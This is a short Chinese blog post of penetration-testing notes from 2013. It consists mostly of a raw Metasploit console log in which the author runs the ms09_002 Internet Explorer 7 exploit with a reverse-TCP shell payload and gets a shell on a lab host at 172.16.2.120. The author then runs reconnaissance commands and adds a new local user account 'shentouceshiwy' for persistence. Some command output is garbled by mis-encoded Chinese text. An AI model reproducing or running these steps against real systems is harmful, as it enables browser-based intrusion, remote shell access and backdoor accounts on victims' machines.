渗透杂记-2013-07-13
2013-07-13 10:39
330 查看
从新浪移过来的
Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
本文出自 “文东会” 博客,转载请与作者联系!
Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283 auxiliary + -- --=[ 210 payloads - 27 encoders - 8 nops =[ svn r9834 updated 308 days ago (2010.07.14) Warning: This copy of the Metasploit Framework was last updated 308 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating >> use windows/browser/ms09_002_memory_corruption >> set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> set SRVHOST 172.16.2.100 SRVHOST => 172.16.2.100 >> set LHOST 172.16.2.100 LHOST => 172.16.2.100 >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.2.100 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 172.16.2.100 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> exploit [*] Exploit running as background job. [*] Started reverse handler on 172.16.2.100:4444 [*] Using URL: http://172.16.2.100:8080/9wZVWxuy [*] Server started. >> back >> sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell 172.16.2.100:4444 -> 172.16.2.120:1125 >> sessions -i 1 sessions -i 1 'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò ?ò?ú′|àí???t?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> ipconfig /all ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : www-95a235b5556 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant SUPPORT_388945a0 ?üá?3é1|íê3é?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user shentouceshiwy /add net user shentouceshiwy /add ?üá?3é1|íê3é?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant shentouceshiwy SUPPORT_388945a0 ?üá?3é1|íê3é?£
本文出自 “文东会” 博客,转载请与作者联系!
相关文章推荐
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 05-07-2013
- 2012—07—13
- C++析构函数为什么要为虚函数 http://www.cnblogs.com/lixiaohui-ambition/archive/2012/07/13/2589716.html
- Expect the Air Jordan 13 Bred 2013 to release early this year
- Apr 07 2013 php批量修改音频文件的属性
- 20171027L08-07-13-002apache日志轮询讲解
- 2013_11_13:关于 new 和delelte 的使用
- 编译chromium - vs2012 (2013-07)
- 2013=7=29 nyist 13题
- Air Jordan 13 was released in new jordan 2013 which was the last season
- 2013第35周五杂记
- w3a-Monitor-update-13-07-10
- Jordan 13 he got game release 03/16/2013
- 13.Oracle杂记——Oracle错误故障诊断监控脚本
- 07SkypeForBusiness2015--Lync2010升级到2013部署Lync2013边缘服务器
- 2013-07-15 ios 题库软件学习总结
- Android面试题__2013_07_25